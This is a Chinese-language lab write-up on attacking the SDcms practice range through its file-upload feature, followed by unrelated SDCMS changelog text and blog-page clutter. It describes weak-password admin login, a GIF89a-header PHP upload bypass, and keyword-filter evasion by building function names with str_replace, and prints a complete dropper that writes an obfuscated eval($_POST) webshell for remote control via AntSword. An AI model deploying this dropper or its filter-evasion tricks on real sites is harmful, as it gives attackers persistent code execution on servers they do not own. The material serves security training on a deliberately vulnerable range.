靶场练习——SDcms文件上传漏洞靶场


前言

今次练习的是SDcms靶场,该靶场是一个文件上传漏洞系列的靶场,靶场如下:


一、寻找网站后台页面

1、点击请登录,查看URL

在这里插入图片描述
如图所示,登录页面参数是?m=login

2、修改URL参数,找到后台登录页面

尝试把上面URL的参数login改成admin,如下图,进入成功。
在这里插入图片描述


二、登录后台管理系统

1、不能使用爆破

这里第一反应使用了账号密码爆破,发现对访问的IP有限制,一旦超过错误访问次数,就会被限制登录,图片如下:
在这里插入图片描述

2、使用弱口令登录

使用账号密码admin/admin,成登录网站后台


三、寻找文件上传点

在这里插入图片描述
找到如图所示的文件上传点


四、上传文件操作

1、上传普通的图片文件,查看数据包

在这里插入图片描述
如图找到文件上传的路径:/upfile/2023/09/

2、尝试上传PHP文件

在Burp中把 .jpg 改成 .php,然后再文件内容中添加GIF89a头部,发现php文件能上传成功。
在这里插入图片描述

尝试访问上传的PHP文件
在这里插入图片描述
访问成功。

3、上传phpinfo()函数,获取系统版本信息

在这里插入图片描述
发现上传失败了,这就说明这里存在过滤,把phpinfo函数给过滤了。

4、绕过过滤

使用str_replace函数来绕过过滤,方法如下:
在这里插入图片描述
绕过成功

打开网页查看
在这里插入图片描述

如下是绕过代码:

<?php
	$a = str_replace("0","","p0h0p0i0n0f0o");
	$a();
?>

五、尝试上传webshell

1、PHP版本注意点

上面可知,靶场使用的PHP版本是7.4.3,这个版本是无法使用assert()函数的,那么就只能使用eval来getshell,但eval使用上面str_replace方法是无法生效的。
这我就想到一个方法,既然eval无法使用str_replace方法绕过,那么我为什么不去使用PHP常见文件的方式,通过运行普通文件从而创建shell文件

2、尝试在上一级目录创建文件

如下图,发现上传失败
在这里插入图片描述
经过测试,发现fopen()函数和file_put_contents()函数同样都被过滤了,没办法,就对这两个函数同样做绕过。方法如下:
在这里插入图片描述
然后使用浏览器打开上传的PHP文件,让文件运行,再访问上级是否生成了shell.php文件
在这里插入图片描述
在这里插入图片描述
访问成功,这就说明shell.php文件成功生成。

3、写入shell

把里面的$data参数换成shell。
在这里插入图片描述

发现这样子还是能检测到eval关键字。不过不要紧,这里只是字符串,我们只需要把$data内容以eval为中心拆成两部分,然后再合并不就可以了吗。

在这里插入图片描述

4、测试shell

使用浏览器打开上传的PHP文件,让其运行
在这里插入图片描述

然后再利用webshell工具来连接测试
在这里插入图片描述
连接成功!

编写后的绕过代码:

GIF89a
<?php
	$filename = "../shell.php";
	$data1 = '<?php class ok{var $arg;function setarg($x){$this->arg = "".$x.null;return $this->arg;}function setarg1($x){$this->arg = "".$this->setarg($x).null;}function go(){ev';

	$data2 = 'al("$this->arg");}}$arr = array($_POST["x"]);$run = new ok;$run->setarg1($arr[0]);$run->go(); ?>';

	$data = $data1.$data2;

	$a = "f0o0p0e0n";
	$open = str_replace("0","",$a);
	$file = $open($filename,"w");

	$b = "f0i0l0e_p0u0t_contents";
	$write = str_replace("0","",$b);
	$write($filename, $data);

	fclose($file);
?>

注意:这里shell需要使用POST,使用GET蚁剑是无法连接的。


  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一.新增功能 1.增加了搜索管理功能,可以记录用户搜索的关键字并进行管理; 2.增加了匿名用户投稿功能,用户前台投稿,管理后台审核; 3.增加了Digg插件功能,默认支持顶和踩,同时可以开发出更多效果; 4.增加附件批量上功能; 5.增加了图片水印及缩略图功能; 6.增加了信息管理的类别转移功能; 7.增加了模板文件化管理功能; 8.增加了蜘蛛来访记录功能,可以随时了解蜘蛛的来访时间; 9.增加了信息来源功能和对信息自动截取描述内容长度的管理; 10.友情链接增加了标识功能,可以根据标识来调用; 11.增加专题管理功能,更加丰富页面表现形式; 12.增加对附件上的大小和文件类型的限制; 13.广告插件增加了对代码广告的支持,增加了广告类别功能; 14.信息管理增加了使用拼音作文件名的功能; 15.静态标签增加了标签说明功能; 16.管理用户增加了笔名功能,用于信息发布的作者; 17.内连接增加了替换次数的限定; 18.Tag标签增加了分页功能; 19.网站地图增加了对单页的支持; 20.增加了申请链接的功能; 21.信息增加了引用和代码运行的功能; 22.增加了系统事务日志的开关功能。 二.修正的Bug 1.修复了留言和评论插件存在的Bug; 2.修复了在虚拟目录下使用单页造成的路径问题; 3.修复了Tag标签不能被删除的Bug; 4.修复了因图片过大而无法全部显示的Bug; 5.修复了搜索因日文假名片造成不正常运行的Bug; 6.修复了其他已知Bug。 三.调整的功能 1.改进了系统模板引擎,新模板引擎调用更灵活方便(这也是1.2版本最大的改动); 2.系统配置文件只保留了部分参数保存进数据库,其他的直接生成配置文件; 3.系统主要配置全部可以后台管理,无需手动更改配置文件; 4.普通系统管理员的权限进行了细致的划分,更加明确权限和分工; 5.改用xhEditor作为SDCMS的默认编辑器,取消对Ewebeditor编辑器的支持; 6.改进了类别、单页的模板选择方式; 7.信息的相关文章改为可以根据标签获得和指定ID的两种形式; 8.广告插件管理调用由标签改为JS调用,并删除了广告组功能; 9.取消了对动态标签的支持; 10.改进了生成管理的表现形式和使用方式; 11.后台用户登陆验证方式作了调整,增加系统安全性; 12.内链接功能进行了进一步修复和完善。
SDCMS是由时代设计全力打造的一款网站信息管理系统。SDCMS以信息为主题,通过以文字和图片标题为起点,以无限栏目分类为支撑,配合多项插件的灵活使用,以达到信息门户的远景!  SDCMS总结各类信息门户的现状,充分考虑符合站长需求的前提下。设计了灵活多变的标签调用方式,满足了不同层次的需求。 SDCMS以安全第一为原则,解决了ASP程序的常见漏洞问题(服务器自身的问题除外)。程序自身无任何后门,严格的代码过滤功能为网站的安全运行提供了可靠的保障。 SDCMS以DIV CSS为框架,在主流的IE和FF浏览器上测试均能正常运行。系统全自动生成HTML文件,无需独自生成任何文件(调整系统界面的除外)。SDCMS做了很大程度上的优化,为每个信息都设置了关键字功能,在同类系统中能尽快被搜索引擎收录,为网站带来流量,甚至收入! SDCMS的发展离不开大家的支持,欢迎有志于参与SDCMS基础建设和发展的各位朋友! 功能简介: SDCMS后台设有五大栏目导航分别为:系统管理、信息管理、插件管理、界面管理以及生成管理。  系统管理:包含系统设置、系统日志、友情链接以及系统帐户管理等栏目的管理。   信息管理:包含通知、信息分类、信息以及单页内容的管理。   插件管理:包含投票 修正的功能 1.修正了修改管理员密码会自动退出登陆的问题 2.修正了友情连接未加上顺序调整的问题 3.修正了FF下广告组不能显示等一系列FF下出现的问题 4.修正了广告管理中的一系列问题 调整的功能 1.上文件按日期放于附件文件夹内 2.改写了图片文件类型判断和站外文件判断函数 3.搜索单独放于search文件夹内 4.重新调整了调用的标签,更加人性化 5.分离了列表、搜索、公告等分页,更加方便设置分页和列表的样式 6.更改了分类关键字的类型 7.评论管理页增加信息链接 8.调整默认编辑器插入图片窗口大小 9.最新信息调用将根目录属性改为是否调用分类信息,具体请看标签说明 10.公告、信息,链接等栏目生成相关信息调整为可选择是否立刻生成 11.SDCMS后台目录调整为可以直接改名而不影响其他设置 12.改进了信息的生成方式,每生成20条信息自动暂停5秒 13.去掉了包含根目录设置的标签中的根目录选项,不在区分目录,且系统不再支持虚拟目录的使用 14.程序开始支持MSSQL的正常使用,存储过程稍后推出。 新增的功能 1.增加信息页面(当前)所在位置的导航连接 2.自定义标签增加作者和评论数量的显示标签 3.编辑器调整,增加去除超链接功能 4.后台登陆增加登陆失败处理次数限制,防止恶意登陆 5.增加站点地图功能sitemap.html和sitemap.xml以及RSS功能 6.后台信息,可以按分类管理信息和搜索信息 7.增加公告,信息以及单页的内分页功能 8.分类增加批量设置功能 9.信息、单页增加自定义名称的功能 10.增加站内链接功能 11.分类增加了分页数量的控制,方便调整各个类别的分页数量 12.信息显示页增加相关文章功能(依据tags,为空则显示最新) 13.增加eWebEditor_V4.60编辑器,后台系统设置里可以自由更换编辑器(需要使用ewebeditor其他版本的用户,只需要将editor/ewebeditor文件替换掉即可) 14.后台增加了对后台、单页以及附件目录的控制 15.增加对单条信息的评论控制,可以单独控制信息评论的开启和关闭防止恶意评论 16.增加对过滤设置的数据处理函数,防止评论,流言等模块出现星号以及不能提交信息的问题 17.最新信息调用增加按最后更新日期排序的功能 18.增加了幻灯信息标签{sdcms:flashinfo(t0,t1,t2,t3,t4)},详细参数请见标签说明

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值